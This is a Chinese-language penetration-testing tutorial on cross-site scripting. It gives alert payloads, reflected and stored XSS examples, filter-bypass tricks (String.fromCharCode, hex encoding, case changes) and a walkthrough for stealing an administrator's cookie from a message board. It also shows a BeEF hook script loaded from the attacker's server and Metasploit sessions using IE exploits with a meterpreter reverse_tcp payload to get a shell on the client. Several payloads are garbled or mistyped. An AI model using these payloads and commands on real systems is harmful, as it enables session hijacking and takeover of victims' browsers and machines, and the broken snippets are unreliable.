Web渗透测试(xss漏洞)
Xss介绍——
XSS (cross-site script) 跨站脚本自1996年诞生以来,一直被OWASP(open web application security project) 评为十大安全漏洞中的第二威胁漏洞。也有黑客把XSS当做新型的“缓冲区溢出攻击”而JavaScript是新型的shellcode。2011年6月份,新浪微博爆发了XSS蠕虫攻击,仅持续16分钟,感染用户近33000个,危害十分严重。XSS最大的特点就是能注入恶意的代码到用户浏览器的网页上,从而达到劫持用户会话的目的。
由于web应用程序对用户的输入过滤不严产生的。攻击者利用网站漏把恶意的脚本代码注入到网页中,当用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采用cookie资料窃取,会话劫持,钓鱼欺骗等攻击手段。
危害——
网络钓鱼,包括盗取各类的用户账号
窃取用户cookie
窃取用户浏览请回话
强制弹出广告页面、刷流量
网页挂马
提升用户权限,进一步渗透网站
传播跨站脚本蠕虫等等
Xss脚本示例——
<html>
<head >xsx test </head >
<body>
<script>alert(“xss”)</script >
</body>
</html>
这段代码使用alert函数来执行打开一个消息框,消息框中显示xss信息,使用xss弹出恶意警告框,代码为:
escript>alert(“xss") </script>
XSS输入也可能是htm代码段,如果使网页不停的刷新,代码为
<meta http-equiv=”refresh” content ="0;” >
嵌入其他网站链接的代码为:
< ifame src http://xxxxx.com width =0 height =0> </ifame>
Xss分类——
反射型xss(一次性)
存储型xss(持久有效)
反射型:
反射型XSS脚本也称作非持久型、参数型跨站脚本、这类型的脚本是最常见的也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中
如:http://www.xx.com/search.php.?key="><script>alert("xss")</script>一般使用的将构造好的URL发给受害者,是受害者点击触发,而且只执行一次。
存储型:
存储型XSS比反射型跨站脚本更具威胁性,并且可能影响到web服务器的自身安全。此类XSS不需要用户点击特定的URL就能执行脚本,攻击者事先将恶意JavaScript代码上传或存储到有漏洞服务器中,只要受害者浏览包含此恶意的代码的页面就会执行恶意代码。
Xss常用工具——(火狐插件)
Hackebar
Live http headers
Editor cookie
Live HTTP Headers:
该工具可以用来抓取http/https的数据连接( 包括get 和post),获取web应用程序流出的流入的数据。我们可以利用该工具发掘web应用程序中的安全漏洞。
Editor cookie:
Cookie信息修改器
示例:
留言板盗取cookie信息
当管理审核后,弹出及有xss漏洞
去注册一个免费xss平台,然后创建一个项目,查看代码,复制到留言板上
然后xss免费平台就会返回内容
这个就是网站管理员cookie
绕过xss限制的几种办法
magic_quote_gpc
HEX编码
改变大小写
关闭标签
绕过magic_quote_gpc:
magic_quotes_gpc=ON是php中的安全设置,开启后会把一些特殊字符进行轮换,比如’(单
引号)转换为\’,”(双引号)号转换为\”, \转换为\\。
比如<script> alert(“xss”);</script>会转换为<script> alert(\”xss\”);</script>,这样XSS就不生效了。针对开启了magic quotes_gpc的网站,可以通过javascript中的String.fromCharCode方法来绕过,可以把alert(“XSS")转换为String.fromCharCode(108,101,114,116,40 34,88,83,83,34,41)那么XSS语句就变成了<script>String.fromCharCode(108,101,114,116,40,34,88,83,83,34.,41,59) </script>String.fromCharCode()是javascri中的字符申方法,用来 把ASCI转换为字符审。
HEX编码:
可以对语句进行hex编码来绕过XSS规则。
比如: <script> alert("xss");</script >
可以转换为:
%3c%73%63%72%69%70%74%61%6c965%72%74%28%22%783%73%22%29%3b%3c%2f%73%6
在线网站:
http://textmechanic.com/ASCII-Hex-Unicode-Base64-Converter.html
http://www.asciitohex.com/
改变大小写:
在测试过程中,我们可以改变测试语句的大小来绕过xss规则,如<script> alert("xss");</script >可以转换为<ScRipt> Alert("Xss");</sCripT >
关闭标签:
<body><script> alert(“xss”);</script> < >
XSS+Beef的使用
示例1:利用beef劫持客户端浏览器
启动beef(用户名beef,密码beef)
<script src="http://自己管理的服务器ip:3000/hook.js"></script>(把这恶意代码上传到有xss漏洞的网站)
当有人访问这个网站的时候,恶意代码生效,我们返回本机beef控制台查看上线客户机
然后劫持浏览器
示例2.利用beef+msf拿用户shell(基于客户端ie6)
先劫持浏览器,然后启动msf
msf > use exploit/windows/browser/ms10_002_aurora(选择漏洞模块)
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp(选择回链)
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.230.156(客户机访问的地址)
msf exploit(ms10_002_aurora) > set SRVPORT 7777(客户机访问的端口)
msf exploit(ms10_002_aurora) > set URIPATH /(网页的根/)
msf exploit(ms10_002_aurora) > set LHOST 192.168.230.100(客户机回链,写自己的地址)
msf exploit(ms10_002_aurora) > set LPORT 4444(回链端口)
msf exploit(ms10_002_aurora) > exploit (开始攻击)
把msf生成的那个连接扔beef去,让客户端访问指定的网站就会触发这个漏洞,就可以拿到客户端权限。
回车》键入sessions -i 》sessions -i 1》shell(成功拿到客户端权限)
示例3.利用beef+msf拿用户shell(基于客户端使用ie789)
先劫持浏览器
msf > use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf) > show options
msf exploit(ie_execcommand_uaf) > set SRVHOST 192.168.230.156
msf exploit(ie_execcommand_uaf) > set SRVPORT 8888
msf exploit(ie_execcommand_uaf) > set URIPATH /
msf exploit(ie_execcommand_uaf) > exploit
然后把生成的这个连接扔beef里,让客户端访问,msf就有返回回链会话,就可以拿到客户端权限了
Xss漏洞扫描与留长期后门——
常用工具:
Wvs
Safe3
W3af
Vega
Xss扫描插件+burp(去下载扫描插件在导入就可以)
